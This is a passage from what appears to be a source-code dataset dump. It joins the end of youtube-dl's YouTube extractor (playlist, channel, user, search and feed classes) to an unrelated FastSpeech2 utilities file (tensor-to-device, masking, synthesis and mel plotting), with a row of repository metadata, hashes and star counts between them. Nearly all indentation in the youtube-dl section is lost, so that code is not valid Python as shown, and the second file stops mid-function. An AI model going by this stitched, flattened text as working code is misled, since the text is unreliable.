'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}, {
'url': 'https://invidio.us/playlist?list=PLDIoUOhQQPlXr63I_vwF9GD8sAKh77dWU',
'only_matching': True,
}]
def _real_initialize(self):
self._login()
def _extract_mix(self, playlist_id):
# The mixes are generated from a single video;
# the id of the playlist is just 'RD' + the video id
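# e.g. the mix 'RDdQw4w9WgXcQ' seeds from the video 'dQw4w9WgXcQ'
# (its last 11 characters).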
ids = []
last_id = playlist_id[-11:]
for n in itertools.count(1):
url = 'https://youtube.com/watch?v=%s&list=%s' % (last_id, playlist_id)
webpage = self._download_webpage(
url, playlist_id, 'Downloading page {0} of Youtube mix'.format(n))
new_ids = orderedSet(re.findall(
r'''(?xs)data-video-username=".*?".*?
href="/watch\?v=([0-9A-Za-z_-]{11})&[^"]*?list=%s''' % re.escape(playlist_id),
webpage))
# Fetch new pages until all the videos are repeated; it seems that
# there are always 51 unique videos.
new_ids = [_id for _id in new_ids if _id not in ids]
if not new_ids:
break
ids.extend(new_ids)
last_id = ids[-1]
url_results = self._ids_to_results(ids)
search_title = lambda class_name: get_element_by_attribute('class', class_name, webpage)
title_span = (
search_title('playlist-title') or
search_title('title long-title') or
search_title('title'))
title = clean_html(title_span)
return self.playlist_result(url_results, playlist_id, title)
def _extract_playlist(self, playlist_id):
url = self._TEMPLATE_URL % playlist_id
page = self._download_webpage(url, playlist_id)
# the yt-alert-message now has tabindex attribute (see https://github.com/ytdl-org/youtube-dl/issues/11604)
for match in re.findall(r'<div class="yt-alert-message"[^>]*>([^<]+)</div>', page):
match = match.strip()
# Check if the playlist exists or is private
mobj = re.match(r'[^<]*(?:The|This) playlist (?P<reason>does not exist|is private)[^<]*', match)
if mobj:
reason = mobj.group('reason')
message = 'This playlist %s' % reason
if 'private' in reason:
message += ', use --username or --netrc to access it'
message += '.'
raise ExtractorError(message, expected=True)
elif re.match(r'[^<]*Invalid parameters[^<]*', match):
raise ExtractorError(
'Invalid parameters. Maybe URL is incorrect.',
expected=True)
elif re.match(r'[^<]*Choose your language[^<]*', match):
continue
else:
self.report_warning('Youtube gives an alert message: ' + match)
playlist_title = self._html_search_regex(
r'(?s)<h1 class="pl-header-title[^"]*"[^>]*>\s*(.*?)\s*</h1>',
page, 'title', default=None)
_UPLOADER_BASE = r'class=["\']pl-header-details[^>]+>\s*<li>\s*<a[^>]+\bhref='
uploader = self._search_regex(
r'%s["\']/(?:user|channel)/[^>]+>([^<]+)' % _UPLOADER_BASE,
page, 'uploader', default=None)
mobj = re.search(
r'%s(["\'])(?P<path>/(?:user|channel)/(?P<uploader_id>.+?))\1' % _UPLOADER_BASE,
page)
if mobj:
uploader_id = mobj.group('uploader_id')
uploader_url = compat_urlparse.urljoin(url, mobj.group('path'))
else:
uploader_id = uploader_url = None
has_videos = True
if not playlist_title:
try:
# Some playlist URLs don't actually serve a playlist (e.g.
# https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4)
next(self._entries(page, playlist_id))
except StopIteration:
has_videos = False
playlist = self.playlist_result(
self._entries(page, playlist_id), playlist_id, playlist_title)
playlist.update({
'uploader': uploader,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
})
return has_videos, playlist
def _check_download_just_video(self, url, playlist_id):
# Check if it's a video-specific URL
query_dict = compat_urlparse.parse_qs(compat_urlparse.urlparse(url).query)
video_id = query_dict.get('v', [None])[0] or self._search_regex(
r'(?:(?:^|//)youtu\.be/|youtube\.com/embed/(?!videoseries))([0-9A-Za-z_-]{11})', url,
'video id', default=None)
if video_id:
if self._downloader.params.get('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
return video_id, self.url_result(video_id, 'Youtube', video_id=video_id)
else:
self.to_screen('Downloading playlist %s - add --no-playlist to just download video %s' % (playlist_id, video_id))
return video_id, None
return None, None
def _real_extract(self, url):
# Extract playlist id
mobj = re.match(self._VALID_URL, url)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
playlist_id = mobj.group(1) or mobj.group(2)
video_id, video = self._check_download_just_video(url, playlist_id)
if video:
return video
if playlist_id.startswith(('RD', 'UL', 'PU')):
# Mixes require a custom extraction process
return self._extract_mix(playlist_id)
has_videos, playlist = self._extract_playlist(playlist_id)
if has_videos or not video_id:
return playlist
# Some playlist URLs don't actually serve a playlist (see
# https://github.com/ytdl-org/youtube-dl/issues/10537).
# Fallback to plain video extraction if there is a video id
# along with playlist id.
return self.url_result(video_id, 'Youtube', video_id=video_id)
class YoutubeChannelIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com channels'
_VALID_URL = r'https?://(?:youtu\.be|(?:\w+\.)?youtube(?:-nocookie)?\.com|(?:www\.)?invidio\.us)/channel/(?P<id>[0-9A-Za-z_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/channel/%s/videos'
_VIDEO_RE = r'(?:title="(?P<title>[^"]+)"[^>]+)?href="/watch\?v=(?P<id>[0-9A-Za-z_-]+)&?'
IE_NAME = 'youtube:channel'
_TESTS = [{
'note': 'paginated channel',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'playlist_mincount': 91,
'info_dict': {
'id': 'UUKfVa3S1e4PHvxWcwyMMg8w',
'title': 'Uploads from lex will',
}
}, {
'note': 'Age restricted channel',
# from https://www.youtube.com/user/DeusExOfficial
'url': 'https://www.youtube.com/channel/UCs0ifCMCm1icqRbqhUINa0w',
'playlist_mincount': 64,
'info_dict': {
'id': 'UUs0ifCMCm1icqRbqhUINa0w',
'title': 'Uploads from Deus Ex',
},
}, {
'url': 'https://invidio.us/channel/UC23qupoDRn9YOAVzeoxjOQA',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
return (False if YoutubePlaylistsIE.suitable(url) or YoutubeLiveIE.suitable(url)
else super(YoutubeChannelIE, cls).suitable(url))
def _build_template_url(self, url, channel_id):
return self._TEMPLATE_URL % channel_id
def _real_extract(self, url):
channel_id = self._match_id(url)
url = self._build_template_url(url, channel_id)
# Channel by page listing is restricted to 35 pages of 30 items, i.e. 1050 videos total (see #5778)
# Workaround by extracting as a playlist if managed to obtain channel playlist URL
# otherwise fallback on channel by page extraction
channel_page = self._download_webpage(
url + '?view=57', channel_id,
'Downloading channel page', fatal=False)
if channel_page is False:
channel_playlist_id = False
else:
channel_playlist_id = self._html_search_meta(
'channelId', channel_page, 'channel id', default=None)
if not channel_playlist_id:
channel_url = self._html_search_meta(
('al:ios:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad'),
channel_page, 'channel url', default=None)
if channel_url:
channel_playlist_id = self._search_regex(
r'vnd\.youtube://user/([0-9A-Za-z_-]+)',
channel_url, 'channel id', default=None)
if channel_playlist_id and channel_playlist_id.startswith('UC'):
playlist_id = 'UU' + channel_playlist_id[2:]
return self.url_result(
compat_urlparse.urljoin(url, '/playlist?list=%s' % playlist_id), 'YoutubePlaylist')
channel_page = self._download_webpage(url, channel_id, 'Downloading page #1')
autogenerated = re.search(r'''(?x)
class="[^"]*?(?:
channel-header-autogenerated-label|
yt-channel-title-autogenerated
)[^"]*"''', channel_page) is not None
if autogenerated:
# The videos are contained in a single page
# the ajax pages can't be used, they are empty
entries = [
self.url_result(
video_id, 'Youtube', video_id=video_id,
video_title=video_title)
for video_id, video_title in self.extract_videos_from_page(channel_page)]
return self.playlist_result(entries, channel_id)
try:
next(self._entries(channel_page, channel_id))
except StopIteration:
alert_message = self._html_search_regex(
r'(?s)<div[^>]+class=(["\']).*?\byt-alert-message\b.*?\1[^>]*>(?P<alert>[^<]+)</div>',
channel_page, 'alert', default=None, group='alert')
if alert_message:
raise ExtractorError('Youtube said: %s' % alert_message, expected=True)
return self.playlist_result(self._entries(channel_page, channel_id), channel_id)
class YoutubeUserIE(YoutubeChannelIE):
IE_DESC = 'YouTube.com user videos (URL or "ytuser" keyword)'
_VALID_URL = r'(?:(?:https?://(?:\w+\.)?youtube\.com/(?:(?P<user>user|c)/)?(?!(?:attribution_link|watch|results|shared)(?:$|[^a-z_A-Z0-9-])))|ytuser:)(?!feed/)(?P<id>[A-Za-z0-9_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/%s/%s/videos'
IE_NAME = 'youtube:user'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheLinuxFoundation',
'playlist_mincount': 320,
'info_dict': {
'id': 'UUfX55Sx5hEFjoC3cNs6mCUQ',
'title': 'Uploads from The Linux Foundation',
}
}, {
# Only available via https://www.youtube.com/c/12minuteathlete/videos
# but not https://www.youtube.com/user/12minuteathlete/videos
'url': 'https://www.youtube.com/c/12minuteathlete/videos',
'playlist_mincount': 249,
'info_dict': {
'id': 'UUVjM-zV6_opMDx7WYxnjZiQ',
'title': 'Uploads from 12 Minute Athlete',
}
}, {
'url': 'ytuser:phihag',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/gametrailers',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/gametrailers',
'only_matching': True,
}, {
# This channel is not available, geo restricted to JP
'url': 'https://www.youtube.com/user/kananishinoSMEJ/videos',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
# Don't return True if the url can be extracted with other youtube
        # extractor; the regex is too permissive and it would match.
        other_yt_ies = iter(
            klass for (name, klass) in globals().items()
            if name.startswith('Youtube') and name.endswith('IE') and klass is not cls)
if any(ie.suitable(url) for ie in other_yt_ies):
return False
else:
return super(YoutubeUserIE, cls).suitable(url)
def _build_template_url(self, url, channel_id):
mobj = re.match(self._VALID_URL, url)
return self._TEMPLATE_URL % (mobj.group('user') or 'user', mobj.group('id'))
class YoutubeLiveIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com live streams'
_VALID_URL = r'(?P<base_url>https?://(?:\w+\.)?youtube\.com/(?:(?:user|channel|c)/)?(?P<id>[^/]+))/live'
IE_NAME = 'youtube:live'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
channel_id = mobj.group('id')
base_url = mobj.group('base_url')
webpage = self._download_webpage(url, channel_id, fatal=False)
if webpage:
page_type = self._og_search_property(
'type', webpage, 'page type', default='')
video_id = self._html_search_meta(
'videoId', webpage, 'video id', default=None)
if page_type.startswith('video') and video_id and re.match(
r'^[0-9A-Za-z_-]{11}$', video_id):
return self.url_result(video_id, YoutubeIE.ie_key())
return self.url_result(base_url)
class YoutubePlaylistsIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com user/channel playlists'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/(?:user|channel)/(?P<id>[^/]+)/playlists'
IE_NAME = 'youtube:playlists'
_TESTS = [{
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'ThirstForScience',
'title': 'Thirst for Science',
},
}, {
# with "Load more" button
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 70,
'info_dict': {
'id': 'igorkle1',
'title': 'Игорь Клейнер',
},
}, {
'url': 'https://www.youtube.com/channel/UCiU1dHvZObB2iP6xkJ__Icw/playlists',
'playlist_mincount': 17,
'info_dict': {
'id': 'UCiU1dHvZObB2iP6xkJ__Icw',
'title': 'Chem Player',
},
}]
class YoutubeSearchBaseInfoExtractor(YoutubePlaylistBaseInfoExtractor):
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})(?:[^"]*"[^>]+\btitle="(?P<title>[^"]+))?'
class YoutubeSearchIE(SearchInfoExtractor, YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com searches'
# there doesn't appear to be a real limit, for example if you search for
# 'python' you get more than 8.000.000 results
_MAX_RESULTS = float('inf')
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_EXTRA_QUERY_ARGS = {}
_TESTS = []
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
videos = []
limit = n
url_query = {
'search_query': query.encode('utf-8'),
}
url_query.update(self._EXTRA_QUERY_ARGS)
result_url = 'https://www.youtube.com/results?' + compat_urllib_parse_urlencode(url_query)
for pagenum in itertools.count(1):
data = self._download_json(
result_url, video_id='query "%s"' % query,
note='Downloading page %s' % pagenum,
errnote='Unable to download API page',
query={'spf': 'navigate'})
html_content = data[1]['body']['content']
if 'class="search-message' in html_content:
raise ExtractorError(
'[youtube] No video results', expected=True)
new_videos = list(self._process_page(html_content))
videos += new_videos
if not new_videos or len(videos) > limit:
break
next_link = self._html_search_regex(
r'href="(/results\?[^"]*\bsp=[^"]+)"[^>]*>\s*<span[^>]+class="[^"]*\byt-uix-button-content\b[^"]*"[^>]*>Next',
html_content, 'next link', default=None)
if next_link is None:
break
result_url = compat_urlparse.urljoin('https://www.youtube.com/', next_link)
if len(videos) > n:
videos = videos[:n]
return self.playlist_result(videos, query)
class YoutubeSearchDateIE(YoutubeSearchIE):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube.com searches, newest videos first'
_EXTRA_QUERY_ARGS = {'search_sort': 'video_date_uploaded'}
class YoutubeSearchURLIE(YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com search URLs'
IE_NAME = 'youtube:search_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/results\?(.*?&)?(?:search_query|q)=(?P<query>[^&]+)(?:[&]|$)'
_TESTS = [{
'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
query = compat_urllib_parse_unquote_plus(mobj.group('query'))
webpage = self._download_webpage(url, query)
return self.playlist_result(self._process_page(webpage), playlist_title=query)
class YoutubeShowIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com (multi-season) shows'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/show/(?P<id>[^?#]*)'
IE_NAME = 'youtube:show'
_TESTS = [{
'url': 'https://www.youtube.com/show/airdisasters',
'playlist_mincount': 5,
'info_dict': {
'id': 'airdisasters',
'title': 'Air Disasters',
}
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
return super(YoutubeShowIE, self)._real_extract(
'https://www.youtube.com/show/%s/playlists' % playlist_id)
class YoutubeFeedsInfoExtractor(YoutubeBaseInfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME and _PLAYLIST_TITLE properties.
"""
_LOGIN_REQUIRED = True
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_initialize(self):
self._login()
def _entries(self, page):
# The extraction process is the same as for playlists, but the regex
# for the video ids doesn't contain an index
ids = []
more_widget_html = content_html = page
for page_num in itertools.count(1):
matches = re.findall(r'href="\s*/watch\?v=([0-9A-Za-z_-]{11})', content_html)
# 'recommended' feed has infinite 'load more' and each new portion spins
            # the same videos in a (sometimes) slightly different order, so we'll check
            # for uniqueness and break when a portion has no new videos
new_ids = list(filter(lambda video_id: video_id not in ids, orderedSet(matches)))
if not new_ids:
break
ids.extend(new_ids)
for entry in self._ids_to_results(new_ids):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), self._PLAYLIST_TITLE,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
more_widget_html = more['load_more_widget_html']
def _real_extract(self, url):
page = self._download_webpage(
'https://www.youtube.com/feed/%s' % self._FEED_NAME,
self._PLAYLIST_TITLE)
return self.playlist_result(
self._entries(page), playlist_title=self._PLAYLIST_TITLE)
class YoutubeWatchLaterIE(YoutubePlaylistIE):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list, ":ytwatchlater" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:feed/watch_later|(?:playlist|watch)\?(?:.+&)?list=WL)|:ytwatchlater'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=WL',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=bCNU9TrbiRk&index=1&list=WL',
'only_matching': True,
}]
def _real_extract(self, url):
_, video = self._check_download_just_video(url, 'WL')
if video:
return video
_, playlist = self._extract_playlist('WL')
return playlist
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube.com favourite videos, ":ytfav" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/my_favorites|:ytfav(?:ou?rites)?'
_LOGIN_REQUIRED = True
def _real_extract(self, url):
webpage = self._download_webpage('https://www.youtube.com/my_favorites', 'Youtube Favourites videos')
playlist_id = self._search_regex(r'list=(.+?)["&]', webpage, 'favourites playlist id')
return self.url_result(playlist_id, 'YoutubePlaylist')
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com recommended videos, ":ytrec" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/recommended|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_PLAYLIST_TITLE = 'Youtube Recommended videos'
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com subscriptions feed, "ytsubs" keyword (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/subscriptions|:ytsubs(?:criptions)?'
_FEED_NAME = 'subscriptions'
_PLAYLIST_TITLE = 'Youtube Subscriptions'
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history, ":ythistory" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/history|:ythistory'
_FEED_NAME = 'history'
_PLAYLIST_TITLE = 'Youtube History'
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
| 45.418428
| 348
| 0.523723
|
a9d07202caf3a081a27c0d5c2f56c1d4203f143c
| 12,291
|
py
|
Python
|
utils/tools.py
|
ttslr/Expressive-FastSpeech2
|
7f1c463d0f10053596de62e5c112ee952f58d924
|
[
"MIT"
] | 79
|
2021-05-17T10:19:40.000Z
|
2022-03-27T09:01:58.000Z
|
utils/tools.py
|
KunZhou9646/Expressive-FastSpeech2
|
7f1c463d0f10053596de62e5c112ee952f58d924
|
[
"MIT"
] | 13
|
2021-05-16T23:07:29.000Z
|
2022-03-20T23:45:04.000Z
|
utils/tools.py
|
KunZhou9646/Expressive-FastSpeech2
|
7f1c463d0f10053596de62e5c112ee952f58d924
|
[
"MIT"
] | 22
|
2021-05-16T09:35:50.000Z
|
2022-03-04T09:52:58.000Z
|
import os
import json
import torch
import torch.nn.functional as F
import numpy as np
import matplotlib
from scipy.io import wavfile
from matplotlib import pyplot as plt
matplotlib.use("Agg")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def to_device(data, device):
if len(data) == 12:
(
ids,
raw_texts,
speakers,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
) = data
speakers = torch.from_numpy(speakers).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
mels = torch.from_numpy(mels).float().to(device)
mel_lens = torch.from_numpy(mel_lens).to(device)
pitches = torch.from_numpy(pitches).float().to(device)
energies = torch.from_numpy(energies).to(device)
durations = torch.from_numpy(durations).long().to(device)
return (
ids,
raw_texts,
speakers,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
)
if len(data) == 15:
(
ids,
raw_texts,
speakers,
emotions,
arousals,
valences,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
) = data
speakers = torch.from_numpy(speakers).long().to(device)
emotions = torch.from_numpy(emotions).long().to(device)
arousals = torch.from_numpy(arousals).long().to(device)
valences = torch.from_numpy(valences).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
mels = torch.from_numpy(mels).float().to(device)
mel_lens = torch.from_numpy(mel_lens).to(device)
pitches = torch.from_numpy(pitches).float().to(device)
energies = torch.from_numpy(energies).to(device)
durations = torch.from_numpy(durations).long().to(device)
return (
ids,
raw_texts,
speakers,
emotions,
arousals,
valences,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
)
if len(data) == 6:
(ids, raw_texts, speakers, texts, src_lens, max_src_len) = data
speakers = torch.from_numpy(speakers).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
return (ids, raw_texts, speakers, texts, src_lens, max_src_len)
if len(data) == 9:
(ids, raw_texts, speakers, emotions, arousals, valences, texts, src_lens, max_src_len) = data
speakers = torch.from_numpy(speakers).long().to(device)
emotions = torch.from_numpy(emotions).long().to(device)
arousals = torch.from_numpy(arousals).long().to(device)
valences = torch.from_numpy(valences).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
return (ids, raw_texts, speakers, emotions, arousals, valences, texts, src_lens, max_src_len)
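# Note added for clarity (not part of the original code): the tuple-length dispatch above
# covers the four batch layouts used in this repository -- 12/15 elements for training
# batches without/with the emotion, arousal and valence labels, and 6/9 elements for the
# corresponding synthesis batches, which carry no mel, pitch, energy or duration targets.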
def log(
logger, step=None, losses=None, fig=None, audio=None, sampling_rate=22050, tag=""
):
if losses is not None:
logger.add_scalar("Loss/total_loss", losses[0], step)
logger.add_scalar("Loss/mel_loss", losses[1], step)
logger.add_scalar("Loss/mel_postnet_loss", losses[2], step)
logger.add_scalar("Loss/pitch_loss", losses[3], step)
logger.add_scalar("Loss/energy_loss", losses[4], step)
logger.add_scalar("Loss/duration_loss", losses[5], step)
if fig is not None:
logger.add_figure(tag, fig)
if audio is not None:
logger.add_audio(
tag,
audio / max(abs(audio)),
sample_rate=sampling_rate,
)
def get_mask_from_lengths(lengths, max_len=None):
batch_size = lengths.shape[0]
if max_len is None:
max_len = torch.max(lengths).item()
ids = torch.arange(0, max_len).unsqueeze(0).expand(batch_size, -1).to(device)
mask = ids >= lengths.unsqueeze(1).expand(-1, max_len)
return mask
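# Worked example added for documentation (a sketch relying on the torch import above, not
# part of the original file): positions at or beyond each sequence length are masked out.
#
#   >>> get_mask_from_lengths(torch.tensor([2, 4], device=device)).tolist()
#   [[False, False, True, True], [False, False, False, False]]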
def expand(values, durations):
out = list()
for value, d in zip(values, durations):
out += [value] * max(0, int(d))
return np.array(out)
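# Worked example added for documentation (not part of the original file): phoneme-level
# values are repeated according to their durations so they line up with frame-level
# features such as the mel spectrogram.
#
#   >>> expand(np.array([1.0, 2.0]), np.array([2, 3])).tolist()
#   [1.0, 1.0, 2.0, 2.0, 2.0]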
def synth_one_sample(targets, predictions, vocoder, model_config, preprocess_config):
basename = targets[0][0]
src_len = predictions[8][0].item()
mel_len = predictions[9][0].item()
mel_target = targets[9][0, :mel_len].detach().transpose(0, 1)
mel_prediction = predictions[1][0, :mel_len].detach().transpose(0, 1)
duration = targets[14][0, :src_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["pitch"]["feature"] == "phoneme_level":
pitch = targets[12][0, :src_len].detach().cpu().numpy()
pitch = expand(pitch, duration)
else:
pitch = targets[12][0, :mel_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["energy"]["feature"] == "phoneme_level":
energy = targets[13][0, :src_len].detach().cpu().numpy()
energy = expand(energy, duration)
else:
energy = targets[13][0, :mel_len].detach().cpu().numpy()
with open(
os.path.join(preprocess_config["path"]["preprocessed_path"], "stats.json")
) as f:
stats = json.load(f)
stats = stats["pitch"] + stats["energy"][:2]
fig = plot_mel(
[
(mel_prediction.cpu().numpy(), pitch, energy),
(mel_target.cpu().numpy(), pitch, energy),
],
stats,
["Synthetized Spectrogram", "Ground-Truth Spectrogram"],
)
if vocoder is not None:
from .model import vocoder_infer
wav_reconstruction = vocoder_infer(
mel_target.unsqueeze(0),
vocoder,
model_config,
preprocess_config,
)[0]
wav_prediction = vocoder_infer(
mel_prediction.unsqueeze(0),
vocoder,
model_config,
preprocess_config,
)[0]
else:
wav_reconstruction = wav_prediction = None
return fig, wav_reconstruction, wav_prediction, basename
def synth_samples(targets, predictions, vocoder, model_config, preprocess_config, path, tag=None):
basenames = targets[0]
for i in range(len(predictions[0])):
basename = basenames[i]
src_len = predictions[8][i].item()
mel_len = predictions[9][i].item()
mel_prediction = predictions[1][i, :mel_len].detach().transpose(0, 1)
duration = predictions[5][i, :src_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["pitch"]["feature"] == "phoneme_level":
pitch = predictions[2][i, :src_len].detach().cpu().numpy()
pitch = expand(pitch, duration)
else:
pitch = predictions[2][i, :mel_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["energy"]["feature"] == "phoneme_level":
energy = predictions[3][i, :src_len].detach().cpu().numpy()
energy = expand(energy, duration)
else:
energy = predictions[3][i, :mel_len].detach().cpu().numpy()
with open(
os.path.join(preprocess_config["path"]["preprocessed_path"], "stats.json")
) as f:
stats = json.load(f)
stats = stats["pitch"] + stats["energy"][:2]
fig = plot_mel(
[
(mel_prediction.cpu().numpy(), pitch, energy),
],
stats,
["Synthetized Spectrogram"],
)
plt.savefig(os.path.join(path, "{}{}.png".format(basename, f"_{tag}" if tag is not None else "")))
plt.close()
from .model import vocoder_infer
mel_predictions = predictions[1].transpose(1, 2)
lengths = predictions[9] * preprocess_config["preprocessing"]["stft"]["hop_length"]
wav_predictions = vocoder_infer(
mel_predictions, vocoder, model_config, preprocess_config, lengths=lengths
)
sampling_rate = preprocess_config["preprocessing"]["audio"]["sampling_rate"]
for wav, basename in zip(wav_predictions, basenames):
wavfile.write(os.path.join(path, "{}{}.wav".format(basename, f"_{tag}" if tag is not None else "")), sampling_rate, wav)
def plot_mel(data, stats, titles):
fig, axes = plt.subplots(len(data), 1, squeeze=False)
if titles is None:
titles = [None for i in range(len(data))]
pitch_min, pitch_max, pitch_mean, pitch_std, energy_min, energy_max = stats
pitch_min = pitch_min * pitch_std + pitch_mean
pitch_max = pitch_max * pitch_std + pitch_mean
def add_axis(fig, old_ax):
ax = fig.add_axes(old_ax.get_position(), anchor="W")
ax.set_facecolor("None")
return ax
for i in range(len(data)):
mel, pitch, energy = data[i]
pitch = pitch * pitch_std + pitch_mean
axes[i][0].imshow(mel, origin="lower")
axes[i][0].set_aspect(2.5, adjustable="box")
axes[i][0].set_ylim(0, mel.shape[0])
axes[i][0].set_title(titles[i], fontsize="medium")
axes[i][0].tick_params(labelsize="x-small", left=False, labelleft=False)
axes[i][0].set_anchor("W")
ax1 = add_axis(fig, axes[i][0])
